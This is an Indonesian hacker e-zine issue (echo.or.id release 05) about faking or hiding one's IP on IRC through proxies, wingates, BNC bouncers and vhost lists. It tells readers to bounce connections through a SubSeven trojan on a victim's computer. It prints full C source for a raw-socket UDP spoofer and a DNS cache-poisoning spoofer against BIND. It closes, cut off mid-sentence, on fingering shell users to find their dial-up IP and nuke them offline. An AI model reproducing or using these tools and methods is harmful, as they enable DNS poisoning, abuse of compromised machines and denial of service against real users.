____________________ ___ ___ ________ \_ _____/\_ ___ \ / | \\_____ \ | __)_ / \ \// ~ \/ | \ | \\ \___\ Y / | \ /_______ / \______ /\___|_ /\_______ / \/ \/ \/ \/ .OR.ID ECHO-ZINE RELEASE 05 Author: basher13 || basher13@stardawn.net Online @ www.echo.or.id :: http://ezine.echo.or.id #Include : 1.Chapter: -.Fake Ip address -.Mendapatkan proxys dan wingates -.Shell providers -.mIRC 2.Chapter: -.Spoff IP melalui mIRC 5.6 3.Chapter: -.WinBNC IP spoff -.Subseven trojan 4.Chapter: -.BNC Spoff -.Linux/Unix spoof 5.Chapter: -.IRC telnet -.Fake vhost 6.Chapter: -.IRC Daemon -.Nukes Shell Account (english) 7.Chapter: -.Gambaran Phone Hack tools ..#1.Chapter *[ Fake Ip address ]. banyak orang yang selalu bertanya-tanya menggunakan IRC secara total anonymous, bagaimana cara meng-fake alamat IP mereka atau bagaimana untuk mendapatkan alamat ip seperti"gates.is.owned.a0l.hax0rz.com ,31337.unixshell. com," atau yang unik seperti ini"bahagianya.hatiku.ketika.melihat.kekasihku. tersenyum.org".Berikut sedikit penjelasannya: *[ Mendapatkan proxys dan wingates ]. Untuk mempermudah meng-fake alamat ip menggunakan IRC server dengan proxys dan wingates. Letakkan proxys dan wingates tersebut di bagian mIRC port ,jika belum mendapatkan mIRC anda bisa menemukannya di situs ini ; http://www.mirc.co.uk atau http://www.mirc.net .Di mIRC progs pilih firewall setting (Options -> Connect -> Firewall).Pastikan anda telah menggunakan proxy server dan sudah men-check terlebih dahulu "Proxy" protocol,jika menggunakan firewall sock4 ,perhatikan "sock4"protocol dan yang lainnya. Sekarang anda pasti bertanya dimana harus mendapatkan proxys dan wingates,ini mudah menggunakan proxy ketimbang wingates yang terlalu riskan.Untuk mendapatkan proxy list ,cari di situs " http://www.cyberarmy.com/lists/proxy ",atau mudahnya lagi sebaiknya anda mencari di mesin cari google.com ( http://www.google.com ),ketik " proxy list".Pastikan yang anda temukan proxy baik wingates harus ditest dahulu untuk memastikan bisa digunakan oleh bounce IRC. *[ Shell providers ] Dalam hal ini anda harus membayar/membeli shell untuk vhost anda .Bagaimana cara untuk menemukan 'shell atau vhost'? Saya saat ini menggunakan shell/vhost dengan harga perbulan Rp.30.000,00 ,untuk shell provider atau vhost ,silahkan klik di situs " http://www.unishell.com " atau cari dari 'http://www.yahoo.com , http://www.google.com ",ketik " shell provider". *[ mIRC ] Setelah anda mendapatkan account shell untuk vhost ,buka program mIRC dan connect ke shell provider, (/server server2.unishell.com 51121),itu hanya contoh dari shell providers yang saya gunakan ,dengan server unishell.com .Port 51121 adalah diamana mereka mempunyai BNC daemon atau psyBNC. Selanjutnya Anda akan di perintahkan untuk memberi password ,dengan mengetik /quote pass [password anda] ..Setelah password anda berikan ,ketik " /bvhost vhost.nama.yang.anda.inginkan.".Dengan mengetik 'JUMP' ,anda telah mendapatkan IP anda berubah /beralih ke vhost tersebut (mis,basher13@31337.unixshell.com, yang sebelumnya basher13@208.37.46.1xx).208.37.46.1xx adalah nomer IP shell provider .selanjutnya Ketik di mIRC window dengan "/whois [nama nick anda]".Untuk connect ke IRC server,tulis 'JUMP irc. server.com 6667',tekan 'enter',untuk connect. ========================================================================================= mIRC | ========================================================================================= -Welcome to psybnc,You'have IRC Client doesn't support password,please type "quote PASS " to connect. --> ketik " /quote pass [password anda] " <-- psyBNC 'password accepted' -->ketik " /bvhost vhost.nama.yang.anda.inginkan " <-- psyBNC " vhost has changed to vhost.nama.yang.anda.inginkan ,JUMP to changed sever" --->ketik " JUMP" <-- psyBNC "host has changed to basher13@31377.unixshell.com " --->ketik "/whois basher13 " <--- Chanserv " basher13 is basher13@31337.unixshell.com Has using irc.webmaster.com His identify him self has idle in 12 minutes , 3 seconds End whois " ========================================================================================== ..#2.Chapter *[ Spoff IP melalui mIRC 5.6] Buka program mIRC anda ,pilih 'option menu' untuk setting firewall ( ALT + O). Lihat di katogorie " + connect",klik untuk membuka firewall setting.Pilih sub-item 'firewall', pastikan anda sudah men-check terlebih dahulu box ' Use SOCKS firewall',(x). Di kotak 'hostname',ketik IP/firewall hostname ,contoh firewall.yangpunya.com. Biarkan kotak USER ID dan PASSWORD kosong dan portnya 1080 ,klik 'ok'.Selanjutnya ketik '/server.. yang.anda.mau 6667 '. :localhost 311 ^FBI^ ^FBI^ ~FBI firewall.someone.com * : basher 13 :localhost 312 ^FBI^ ^FBI^ localhost :test server :localhost 317 ^FBI^ ^FBI^ 9 932030074 :seconds idle, signon time :localhost 318 ^FBI^ ^FBI^ :End of /WHOIS list. Sekarang anda lihat bahwa saya host saya berubah menjadi firewall.someone.com yang sebelumnya ialah 31337.unixshell.com.Untuk mendapatkan firewall list ,caoba temukan di Astalavista (http:// www.astalavista.com ),atau di mesincari google.com,yahoo.com ,dll dengan mengetik "firewall list". :localhost 311 ^FBI^ ^FBI^ ~FBI firewall.someone.com * : basher 13 :localhost 312 ^FBI^ ^FBI^ localhost :test server :localhost 317 ^FBI^ ^FBI^ 9 932030074 :seconds idle, signon time :localhost 318 ^FBI^ ^FBI^ :End of /WHOIS list. Penjelasan mengenai line yang ada sperti di atas: ~FBI 31337.unixhsell.com * :basher13 | | |_ Nama asal sang user | |_ User host atau IP |_ Username (set oleh IdentD). line yang kedua: localhost :test server | |_ pesan oleh server (set oleh server admin) |_ Server yang digunakan untuk connect Line yang ketiga: 9 932030074 :seconds idle, signon time | |_Sang User signed in /login ke server |_ Berapa waktu sang user berada di server tersebut line terakahir: :End of /WHOIS list. |_ Menampilkan bahwa data sudah tidak ada. Dimana jika alamat IP anda telh diketahui,bisa mengakibatkan sang penyerang membuat Denial of Service (DoS),seperti winnkue,ComNUKE,atau lovely ping flood yang dapat mengakibatkan sebuah bandwhit melebihi kapasitasnya atau mereboot ulang komputer anda. ..#3.Chapter *[ WinBNC IP spoff ] Anda harus mempunyai partner/teman untuk bounce IP mereka melalui IRC.Manakala mereka harus mempunyai WinBNC daemon software(Jika operating system mereka lain dari windows,sangat dibutuhkan BNC, ezBNC etc ).Daemon dibuat untuk jenis platform lain, anda bisa connect melalui komputer dan alamat ip mereka.Cari di situs yang menyediakan search engine /mesin cari (www.google.com,www.yahoo.com)'ketik "winbnc etc".Sebelum teman anda menggunakan daemon anda harus jelsa akan port,password dan admin password,hal ini akan direkomendasikan akan spesifikasi list dari IP/DNS,yand berguna bagi BNC (list harus sudah termasuk dengan IP anda,bisa langsung connect ke BNC teman/partner).konfigurasi ini di edit melalui bnc.cfg dengan notepad atau text-editor.Sekarang suruh partner/teman anda membuka MS-DOS prompt dan pergi ke directory dimana WinBNC sudah unzipped,dan selanjutnya ke bnc.exe.Dan mereka akan memberi alamat IP ,WinBNC password dan post.Dimana anda akan menggunakan value tersebut untuk IRC,mis; /server 144.64.24.100 namaport password Setelah anda connect ke partner/teman WinBNC,type atau ketik /quote conn irc.nama.server ircserversport password (dan pastikan juga teman anda tidak mempunyai vhost,jadi anda bisa connect melalui IP) *[ Subseven trojan ] Cara lain untk meng-spoff IP anda adalah menggunakan Subseven trojan,disini akan digunakan untuk meng-direct semua data dari asalnya,(mis;IRC server),yang dipastikan tidak akan terjadi suatu kominikasi antara anda dan hanya terjadi oleh korban dari SubSeven .Setelah anda mendapatkan SubSeven dari si korban ,anda harus connect lewat SubSeven klient dan set up ke port redirect. Anda haru mengisi input port, output port dan output host.input port ialah port dimana anda connect ke IRC,outport ialah port IRC server,dan output host adalah akhir dari port server yang digunakan untuk connect.Ketik input port '2000' ,outport ketik '6667',dan output host ketik 'server.yang.dituju'. mis;irc.webmaster.com. Sekarang anda sudah selasi dengan Subseven,tutup dan buka progrms IRC klient anda. Ketik beberapa command :/server sub7korbanip inputportyangandatahu (for ex. /server 212.213.100.2 2000) ..Anda sudah rehubung ke IRC dan connect melalui Subseven korban untuk membuat IP berubah/hide,caranya ,ketik di main windows IRC /mIRC dengan :/whois nama anda ..#4.chapter *[ WinBNC ] BNC adalah sebuah software yang menggunakan Unix komputer.Contohnya ada sebuah BNC di bnc.shell.com port 1234,yang anda lakukan ialah mengetik /server bnc.shell.com 1234 seperti; -BNC- Please type your password via /quote pass Duh...passwordnya apa?,jika anda sudah mengetahui/mempunyai password tersebut dengan mengetik '/qoute pass password'.Jika tidak mempunyai password ,minta kepada mereka yang memiliki BNC,dan juga menanyakan apakah mereka mempunyai vhost,jika ada ,anda tinggal ketik '/quote vip nama.host.anda' Tulis atau ketik /conn irc.nama.server ,untuk connect ke server yang dituju. *[ Linux/Unix spoff ] Yang anda perlukan ialah compile semua untuk linux/Unix. 1.Arnudp.c // kirim sebuah udp datagram dengan source/destination address/port // Jika tidak terdapat kemungkinan IP_HDRINCL config, alamat source akan // set ke alamat aslinya. Ini akan bekerja di SunOS 5.4. */ // Seharusnya compile dengan baik bersama ANSI compiler (seperti gcc)dibawah // Linux dan SunOS 4.1, tapi dengan SunOS 5.4 anda harus memperhatikan // libraries di command line: // /usr/ucb/cc -o arnudp arnudp001.c -lsocket -lnsl // Ini akan bekerja sebagai root! #include #include #include #include #include #include #include #include #include #include #include struct sockaddr sa; main(int argc,char **argv) { int fd; int x=1; struct sockaddr_in *p; struct hostent *he; u_char gram[38]= { 0x45, 0x00, 0x00, 0x26, 0x12, 0x34, 0x00, 0x00, 0xFF, 0x11, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0x00, 0x12, 0x00, 0x00, '1','2','3','4','5','6','7','8','9','0' }; if(argc!=5) { fprintf(stderr,"usage: %s sourcename sourceport destinationname destinationport\n",*argv); exit(1); }; if((he=gethostbyname(argv[1]))==NULL) { fprintf(stderr,"can't resolve source hostname\n"); exit(1); }; bcopy(*(he->h_addr_list),(gram+12),4); if((he=gethostbyname(argv[3]))==NULL) { fprintf(stderr,"can't resolve destination hostname\n"); exit(1); }; bcopy(*(he->h_addr_list),(gram+16),4); *(u_short*)(gram+20)=htons((u_short)atoi(argv[2])); *(u_short*)(gram+22)=htons((u_short)atoi(argv[4])); p=(struct sockaddr_in*)&sa; p->sin_family=AF_INET; bcopy(*(he->h_addr_list),&(p->sin_addr),sizeof(struct in_addr)); if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))== -1) { perror("socket"); exit(1); }; #ifdef IP_HDRINCL fprintf(stderr,"we have IP_HDRINCL :-)\n\n"); if (setsockopt(fd,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0) { perror("setsockopt IP_HDRINCL"); exit(1); }; #else fprintf(stderr,"we don't have IP_HDRINCL :-(\n\n"); #endif if((sendto(fd,&gram,sizeof(gram),0,(struct sockaddr*)p,sizeof(struct sockaddr)))== -1) { perror("sendto"); exit(1); }; printf("datagram sent without error:"); for(x=0;x<(sizeof(gram)/sizeof(u_char));x++) { if(!(x%4)) putchar('\n'); printf("%02x",gram[x]); }; putchar('\n'); } /************************************************************************/ 2.Jizz (ip host spoofer) #define VERSION ".01b" #include #include #include #include #include #include #include #include #define MAXBUFSIZE 64*1024 #define DC_A 1 #define DC_NS 2 #define DC_CNAME 5 #define DC_SOA 6 #define DC_WKS 11 #define DC_PTR 12 #define DC_HINFO 13 #define DC_MINFO 14 #define DC_MX 15 #define DC_TXT 16 typedef struct { unsigned short id; unsigned char rd:1; /* recursion desired */ unsigned char tc:1; /* truncated message */ unsigned char aa:1; /* authoritive answer */ unsigned char opcode:4; /* purpose of message */ unsigned char qr:1; /* response flag */ unsigned char rcode:4; /* response code */ unsigned char unused:2; /* unused bits */ unsigned char pr:1; /* primary server required (non standard) */ unsigned char ra:1; /* recursion available */ unsigned short qdcount; unsigned short ancount; unsigned short nscount; unsigned short arcount; } dnsheaderrec; typedef struct { unsigned short labellen; char label[256]; unsigned short type; unsigned short class; unsigned long ttl; unsigned short buflen; char buf[256]; } dnsrrrec; typedef struct { dnsheaderrec h; dnsrrrec qd[20]; dnsrrrec an[20]; dnsrrrec ns[20]; dnsrrrec ar[20]; } dnsrec; char *dnssprintflabel(char *s, char *buf, char *p); char *dnsaddlabel(char *p, char *label); void dnstxt2rr(dnsrrrec *rr, char *b); void dnsbuildpacket(dnsrec *dns, short qdcount, short ancount, short nscount, short arcount, ...); char *dnsaddbuf(char *p, void *buf, short len); int dnsmakerawpacket(dnsrec *dns, char *buf); unsigned long rev_long(l) unsigned long l; { unsigned long i = 0; int n = sizeof(i); while (n--) { i = (i << 8) | (l & 255); l >>= 8; } return i; } char *dnssprintflabel(char *s, char *buf, char *p) { unsigned short i,len; char *b=NULL; len=(unsigned short)*(p++); while (len) { while (len >= 0xC0) { if (!b) b=p+1; p=buf+(ntohs(*((unsigned short *)(p-1))) & ~0xC000); len=(unsigned short)*(p++); } for (i=0;ilabel,tok[0]); rr->labellen=p-rr->label; i=1; if (isdigit(*p)) rr->ttl=htonl(atol(tok[i++])); else rr->ttl=htonl(DEFAULTTTL); if (strcmp(tok[i],"IN") == 0) i++; rr->class=htons(1); if (strcmp(tok[i],"A") == 0) { i++; rr->type=htons(DC_A); if (i < numt) { inet_aton(tok[i],rr->buf); rr->buflen=4; } else rr->buflen=0; return; } if (strcmp(tok[i],"CNAME") == 0) { i++; rr->type=htons(DC_CNAME); if (i < numt) { p=dnsaddlabel(rr->buf,tok[i]); rr->buflen=p-rr->buf; } else rr->buflen=0; return; } if (strcmp(tok[i],"NS") == 0) { i++; rr->type=htons(DC_NS); if (i < numt) { p=dnsaddlabel(rr->buf,tok[i]); rr->buflen=p-rr->buf; } else rr->buflen=0; return; } if (strcmp(tok[i],"PTR") == 0) { i++; rr->type=htons(DC_PTR); if (i < numt) { p=dnsaddlabel(rr->buf,tok[i]); rr->buflen=p-rr->buf; } else rr->buflen=0; return; } if (strcmp(tok[i],"MX") == 0) { i++; rr->type=htons(DC_MX); if (i < numt) { p=rr->buf; *((unsigned short *)p)=htons(atoi(tok[i++])); p+=2; p=dnsaddlabel(p,tok[i]); rr->buflen=p-rr->buf; } else rr->buflen=0; return; } } void dnsbuildpacket(dnsrec *dns, short qdcount, short ancount, short nscount, short arcount, ...) { int i; va_list va; dns->h.qdcount=htons(qdcount); dns->h.ancount=htons(ancount); dns->h.nscount=htons(nscount); dns->h.arcount=htons(arcount); dns->h.rcode=0; va_start(va, arcount); for (i=0;iqd[i],va_arg(va, char *)); for (i=0;ian[i],va_arg(va, char *)); for (i=0;ins[i],va_arg(va, char *)); for (i=0;iar[i],va_arg(va, char *)); va_end(va); } char *dnsaddbuf(char *p, void *buf, short len) { memcpy(p,buf,len); return(p+len); } int dnsmakerawpacket(dnsrec *dns, char *buf) { char *p; int i; unsigned short len; memcpy(buf,&dns->h,sizeof(dnsheaderrec)); p=buf+sizeof(dnsheaderrec); /********** Query ***********/ for (i=0;ih.qdcount);i++) { p=dnsaddbuf(p,dns->qd[i].label,dns->qd[i].labellen); p=dnsaddbuf(p,&dns->qd[i].type,2); p=dnsaddbuf(p,&dns->qd[i].class,2); } /********** Answer ***********/ for (i=0;ih.ancount);i++) { p=dnsaddbuf(p,dns->an[i].label,dns->an[i].labellen); p=dnsaddbuf(p,&dns->an[i].type,2); p=dnsaddbuf(p,&dns->an[i].class,2); p=dnsaddbuf(p,&dns->an[i].ttl,4); len=htons(dns->an[i].buflen); p=dnsaddbuf(p,&len,2); p=dnsaddbuf(p,dns->an[i].buf,dns->an[i].buflen); } /********** Nameservers ************/ for (i=0;ih.nscount);i++) { p=dnsaddbuf(p,dns->ns[i].label,dns->ns[i].labellen); p=dnsaddbuf(p,&dns->ns[i].type,2); p=dnsaddbuf(p,&dns->ns[i].class,2); p=dnsaddbuf(p,&dns->ns[i].ttl,4); len=htons(dns->ns[i].buflen); p=dnsaddbuf(p,&len,2); p=dnsaddbuf(p,dns->ns[i].buf,dns->ns[i].buflen); } /********** Additional ************/ for (i=0;ih.arcount);i++) { p=dnsaddbuf(p,dns->ar[i].label,dns->ar[i].labellen); p=dnsaddbuf(p,&dns->ar[i].type,2); p=dnsaddbuf(p,&dns->ar[i].class,2); p=dnsaddbuf(p,&dns->ar[i].ttl,4); len=htons(dns->ar[i].buflen); p=dnsaddbuf(p,&len,2); p=dnsaddbuf(p,dns->ar[i].buf,dns->ar[i].buflen); } return(p-buf); } void main(int argc, char *argv[]) { int sock, fromlen, numread, len, query; struct sockaddr_in sa, from, to; struct in_addr rev; char *buf, *sendbuf; char *domainnamebuf; dnsheaderrec *dns; char *p; dnsrec dnsh; char *beginhost_QD, *beginhost_A, *beginhost_srch; char *fakenshost_A, *fakens_DOM; char *spoofedip_A, *spoofedip_PTR, *spoofedip_rev; printf("jizz %s -- dns spoofer (BIND cache vuln.)\n",VERSION); printf("by nimrood\n\n"); if (argc != 7) { printf("usage: \n%s \n",argv[0]); printf(" beginhost : requested to initiate false caching, ex: begin.ib6ub9.com\n"); printf(" fakenshost : server name to answer false PTR's, ex: ns.ib6ub9.com\n"); printf(" fakensip : IP of server name to answer false PTR's, ex: 205.160.29.19\n"); printf(" fakensdom : domain name false name server controls, ex: ib6ub9.com\n"); printf(" spoofedip : IP of machine you want to spoof from, ex: 204.154.2.93\n"); printf(" spoofedhost: name you want to spoof, ex: teak.0wns.j00\n\n"); exit(-1); } if ((beginhost_QD = malloc((strlen(argv[1]))+5+1)) == NULL) { perror("malloc"); exit(-1); } if ((beginhost_A = malloc(strlen(argv[1])+15+1)) == NULL) { perror("malloc"); exit(-1); } if ((beginhost_srch = malloc(strlen(argv[1])+1+1)) == NULL) { perror("malloc"); exit(-1); } if ((fakenshost_A = malloc(strlen(argv[2])+strlen(argv[3])+6+1)) == NULL) { perror("malloc"); exit(-1); } if ((fakens_DOM = malloc(strlen(argv[4])+strlen(argv[2])+4+1)) == NULL) { perror("malloc"); exit(-1); } if ((spoofedip_A = malloc(strlen(argv[6])+strlen(argv[5])+6+1)) == NULL) { perror("malloc"); exit(-1); } if ((spoofedip_PTR = malloc(strlen(argv[5])+strlen(argv[6])+21+1)) == NULL) { perror("malloc"); exit(-1); } if ((spoofedip_rev = malloc(strlen(argv[5])+1)) == NULL) { perror("malloc"); exit(-1); } if ((buf = malloc(MAXBUFSIZE)) == NULL) { perror("malloc"); exit(-1); } if ((sendbuf = malloc(MAXBUFSIZE)) == NULL) { perror("malloc"); exit(-1); } if ((domainnamebuf = malloc(MAXBUFSIZE)) == NULL) { perror("malloc"); exit(-1); } if ((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0) { perror("socket"); exit(-1); } beginhost_QD = strcpy(beginhost_QD,argv[1]); beginhost_QD = strcat(beginhost_QD, " IN A"); beginhost_A = strcat(strcpy(beginhost_A,beginhost_QD), " 127.0.0.1"); beginhost_srch = strcat(strcpy(beginhost_srch,argv[1]), "."); printf("%s\n",beginhost_srch); fakenshost_A = strcat(strcpy(fakenshost_A,argv[2]), " IN A "); fakenshost_A = strcat(fakenshost_A, argv[3]); fakens_DOM = strcat(strcpy(fakens_DOM,argv[4]), " IN NS "); fakens_DOM = strcat(fakens_DOM,argv[2]); spoofedip_A = strcat(strcpy(spoofedip_A,argv[6]), " IN A "); spoofedip_A = strcat(spoofedip_A,argv[5]); rev.s_addr = rev_long(inet_addr(argv[5])); spoofedip_PTR = strcat(strcpy(spoofedip_PTR,(char *)inet_ntoa(rev.s_addr)), ".IN-ADDR.ARPA IN PTR "); spoofedip_PTR = strcat(spoofedip_PTR,argv[6]); printf("%s\n%s\n%s\n%s\n%s\n%s\n", beginhost_QD,beginhost_A,fakenshost_A,fakens_DOM,spoofedip_A,spoofedip_PTR); sa.sin_family = AF_INET; /* sa.sin_addr.s_addr = inet_addr(DEFAULTBINDHOST); */ sa.sin_addr.s_addr = INADDR_ANY; sa.sin_port = htons(53); if (bind(sock, (struct sockaddr *)&sa, sizeof(sa)) < 0) { perror("bind"); exit(-1); } setvbuf(stdout,NULL,_IONBF,0); while (1) { fromlen=sizeof(from); if ((numread = recvfrom(sock, buf, MAXBUFSIZE, 0, (struct sockaddr *)&from, &fromlen)) < 0) { perror("recvfrom"); continue; } /* Kludge to stop that damn router */ if (from.sin_addr.s_addr == inet_addr("206.126.32.10")) continue; dns=(dnsheaderrec *)buf; if (dns->qr) continue; p=dnssprintflabel(domainnamebuf,buf,&buf[sizeof(dnsheaderrec)]); query=ntohs(*(unsigned short *)p); printf("Packet from %s : %d : %s (%d)\n",inet_ntoa(from.sin_addr),ntohs(from.sin_port),domainnamebuf,query); if (strcasecmp(domainnamebuf,beginhost_srch) == 0) { dnsbuildpacket(&dnsh,1,4,1,1, beginhost_QD, beginhost_A, spoofedip_A, spoofedip_PTR, fakenshost_A, fakens_DOM, "www.yahoo.com IN A 255.255.255.255"); } else { /* Error */ dnsh.h.rcode=5; strcat(domainnamebuf," IN A"); dnsbuildpacket(&dnsh,1,0,0,0, domainnamebuf); } dnsh.qd[0].type=htons(query); dnsh.h.id=((dnsheaderrec *)buf)->id; dnsh.h.qr=1; dnsh.h.aa=1; len=dnsmakerawpacket(&dnsh,sendbuf); to.sin_family=AF_INET; to.sin_addr.s_addr=from.sin_addr.s_addr; to.sin_port=from.sin_port; if (sendto(sock,sendbuf,len,0,(struct sockaddr *)&to,sizeof(to)) < 0) { perror("sendto"); continue; } } } ..#5.Chapter *[ IRC Telnet ] buka telnet anda atau ketik 'telnet 'yang terdapat di 'run',pilih 'start'. ============================================================================== ============================================================================== Welcome to Microsoft Telnet Client Escape Character is 'CTRL+]' Microsoft Telnet> o ( to ) irc.namaserver.com :6667 Connecting To irc.webmaster.com... Connected Microsoft Telnet> --> ketik'Nick' untuk setting nama nick anda -->ketik "USER username host server",nama asli anda , host dan server yang digunakan untuk connect. * nick ^basher13^ NOTICE ^basher13^ :*** If you are having problems connecting due to ping timeouts, please type /notice E3AA3478 nospoof now. PING :E3AA3478 * user ^basher13^ 127.0.0.1 localhost :The Cyber God :localhost 001 ^basher13^ :Welcome to the DALnet IRC Network ^basher13^!~basher13@31337.unixshell.com :localhost 002 ^basher13^ :Your host is localhost[31337.unixshell.com], running version dal4.6.7.DreamForge.win32 :localhost 003 ^basher13^ :This server was created Fri Jul 24 07:48:52 1998 :localhost 004 ^basher13^ localhost dal4.6.7.DreamForge.win32 oiwsghOkcfrRaAb biklmnopstvR :localhost 005 ^basher13^ NOQUIT TOKEN WATCH=128 SAFELIST :are available on this server :localhost 251 ^basher13^ :There are 0 users and 0 invisible on 1 servers :localhost 253 ^basher13^ 4 :unknown connection(s) :localhost 255 ^basher13^ :I have 0 clients and 0 servers :localhost 265 ^basher13^ :Current local users: 0 Max: 0 :localhost 266 ^basher13^ :Current global users: 0 Max: 0 :localhost 422 ^basher13^ :MOTD File is missing :^basher13^ MODE ^basher13^ :+iw .... ok ============================================================================== *[ Fake vhost ] Saat ini mungkin anda sudah mempunyai shell account ,jika belum bisa baca di *[ Shell providers ].#1.chapter,untuk mendapatkan shell provider berikut vhost. Buka program mIRC ,ketik ; ========================================================================================= mIRC | ========================================================================================= -Welcome to psybnc,You'have IRC Client doesn't support password,please type "quote PASS " to connect. --> ketik " /quote pass [password anda] " <-- psyBNC 'password accepted' --> ketik " /bvhost 208.37.46.xxx" (208.37.46.xxx )adalah nomer IP shell provider yang digunakan untuk membuat Fake vhost. - Dibawah ini ada beberapa vhost list yang sudah terdaftar ; 208.37.46.103 t.e.r.s.e.n.y.u.m.tersenyum.org 208.37.46.104 always.tersenyum.org 208.37.46.105 suka.tersenyum.org 208.37.46.106 jatuh.cinta.di.pandangan.pertama.ketika.tersenyum.org 208.37.46.107 imutnya.ketika.pacarku.sedang.tersenyum.org 208.37.46.108 bahagianya.hatiku.ketika.melihat.kekasihku.tersenyum.org 208.37.46.109 bagaikan.bintang2.tersenyum.org 208.37.46.110 bot.hepi.suka.tersenyum.org 208.37.46.111 halo.cewek.info 208.37.46.112 cewek.cewek.info 208.37.46.113 cewek.cewek.cewek.info 208.37.46.114 kemarilah.cewek.cewek.info 208.37.46.115 c.ce.cew.cewe.cewek.info 208.37.46.116 bot.ini.adalah.cewek.info 208.37.46.117 Beverly.Newyork.Santa-Monica.Los-Angeles.Amrik.org 208.37.46.118 california.amrik.org 208.37.46.119 australia.asia.afrika.eropa.amrik.org 208.37.46.120 jangan.kau.tinggalkan.aku.terpuruk.disini.org 208.37.46.121 disini.disana.disini.disana.disini.disana.disini.org 208.37.46.122 d.di.dis.disi.disin.disini.org 208.37.46.123 elite.FreeBSDTech.com 208.37.46.124 Staff.FreeBSDTech.com 208.37.46.125 Formatting.micr0s0ft.and.get.the.FreeBSDTech.com 208.37.46.126 Fragment.FreeBSDTech.com 208.37.46.127 Traffixx.connected.attempt.FreeBSDTech.com 208.37.46.128 world.communication.spoof.FreeBSDTech.com 208.37.46.129 OperServ.FreeBSDTech.com 208.37.46.130 packet.FreeBSDTech.com 208.37.46.131 LinuxTech.FreeBSDTech.com 208.37.46.132 system.FreeBSDTech.com 208.37.46.133 sys-ADMIN.FreeBSDTech.com 208.37.46.134 power.by.FreeBSDTech.com 208.37.46.135 95.98.ME.2000.NT.XP.MAC.Linux.FreeBSDTech.com 208.37.46.136 is.using.FreeBSDTech.com 208.37.46.137 dialup.IP-24.FreeBSDTech.com 208.37.46.138 8.years.uptime.with.FreeBSDTech.com 208.37.46.139 FreeBSDTech.com 208.37.46.140 proffessional.FreeBSDTech.com 208.37.46.141 guru.FreeBSDTech.com 208.37.46.142 AIX.HP-unix.redhat.mandrake.sunsolaris.FreeBSDTech.com 208.37.46.143 Code.encription.of.FreeBSDTech.com 208.37.46.144 eleet.FreeBSDTech.com 208.37.46.145 global-security.unixshell.ws 208.37.46.146 the.master.of.all.unixshell.ws 208.37.46.147 CT-3.unixshell.ws 208.37.46.148 ICMP.flood.from.unixshell.ws 208.37.46.149 cluster.allocation.packet.dropped.unixshell.ws 208.37.46.150 eggdrop.unixshell.ws 208.37.46.151 Firewall.72x.deny.recepient.unixshell.ws 208.37.46.152 31337.unixshell.ws 208.37.46.153 CABLE-144-183-19-92.unixshell.ws 208.37.46.154 358.2058.st.unixshell.ws 208.37.46.155 linuxshell.unixshell.ws 208.37.46.156 eye.am.going.to.packet.your.unixshell.ws 208.37.46.157 unixshell.ws 208.37.46.158 eggdrop.unixshell.ws 208.37.46.159 rm-rf.unixshell.ws 208.37.46.160 eleet.unixshell.ws 208.37.46.161 baby.ceting.com 208.37.46.162 major.ceting.com 208.37.46.163 hacker.ceting.com 208.37.46.164 Internet.cafe.ceting.com 208.37.46.165 berjam.jam.ceting.com 208.37.46.166 pagi.siang.sore.malam.selalu.ceting.com 208.37.46.167 pusing.gara.gara.kebanyakan.ceting.com 208.37.46.168 tsunami.flood.ceting.com 208.37.46.169 hacker.ceting.com 208.37.46.170 lagging.ceting.com 208.37.46.171 tukang.ceting.com 208.37.46.172 pengennnn.ceting.com 208.37.46.173 simple.ceting.com 208.37.46.174 united.kingdom.of.ceting.com 208.37.46.175 kafe.ceting.com 208.37.46.176 gatel.nih.tangan.kalo.gak.ceting.com 208.37.46.177 boss.ceting.com 208.37.46.178 no.more.ceting.com 208.37.46.179 pulsa.jadi.naik.gara2.dialup.ceting.com 208.37.46.180 raja.ceting.com 208.37.46.181 overflow.ed.Indofreebsd.info 208.37.46.182 bots.indofreebsd.info 208.37.46.183 BSDi.NetBSD.FreeBSD.IndoFreeBSD.info 208.37.46.184 CPE-203-173-18-3.syd.IndoFreeBSD.info 208.37.46.185 hacket.IndoLinux.info 208.37.46.186 SuSe.IndoLinux.info 208.37.46.187 chat-uk3.IndoLinux.info 208.37.46.188 channel.DAL-n-e-t.net 208.37.46.189 raja.DAL-n-e-t.net 208.37.46.190 senin.selasa.rabu.kamis.jumat.sabtu.minggu.net 208.37.46.191 m.i.n.g.g.u.minggu.net 208.37.46.192 malem.minggu.net 208.37.46.193 sabtu.minggu.net 208.37.46.194 grape.eskrim.net 208.37.46.195 saya.manis.seperti.eskrim.net 208.37.46.196 imut.seperti.eskrim.net 208.37.46.197 La.La.La.La.La.makan.eskrim.net 208.37.46.198 saya.manis.seperti.eskrim.net 208.37.46.199 b0t.manteb.com 208.37.46.200 pacarku.makin.cantik.aja.sekarang.net 208.37.46.201 pemberian.cinta.mu.tidak.akan.kulupakan.sejak.sekarang <-- psyBNC " vhost has changed to 208.37.46.xxx ,JUMP to changed sever" --->ketik " JUMP" untuk merubah atau membuat fake vhost dari server. Setelah berubah atau berganti server ,ketik di window mIRC ' /whois namanickanda' Anda akan melihat bahwa IP/vhost anda berubah. Untuk lebih jelas anda bisa mengetik '/dns 208.37.46.2xx',pakai shell tersebut untuk vhost anda. ======================================================================================== ..#6.Chapter *[ IRC daemon ] Menggunakan IRC daemon sangat mudah untuk mengetahui bagaimana protocol bisa berjalan dan juga untuk spoff Ip melalui telnet menggunakan shell account dengan IRC klient tanpa akses. [Connecting to the IRC daemon] Telnet/netcat (yep... anda menggunakan raw socket) IRC port (6667/6668..etc) eg <:> telnet irc.dal.net 6667 Beri nick & username untuk recognized setelah kamu connected menggunakan user command form "user ". eg <:> user nobody localhost localhost :I'm nobody nick nobody !ingat! Jika sewaktu-waktu mendapatkan seperti ini; ping :1234567 atau ping :192.0.0.1 <-- Sebuah IP address Anda harus mengirim kembali pesan tersebut dengan,cara; eg <:> pong :1234567 atau pong :192.0.0.1 Jika tidak segera mengirim kembali dengan pong,maka anda disconnect dari server. *[ Nukes Shell Account ] {english version} If you're using windows, you should download a program that will allow you to finger a server. Cyberkit is a good program, for it has Ping, Finger, Traceroute, etc. get it at http://www.ping.be/cyberkit/cyber.zip, or go find one of your own. there are hundreds to choose from. (no we're not being endorsed by cyberkit, it's just a kickass proggie) Most shell account users will login from a dial-up account, and if finger is running on their shell, it should display the dial-up IP address. Finger the server and once you know this, use your nuker to disconnect them from their shell by replacing the IRC server 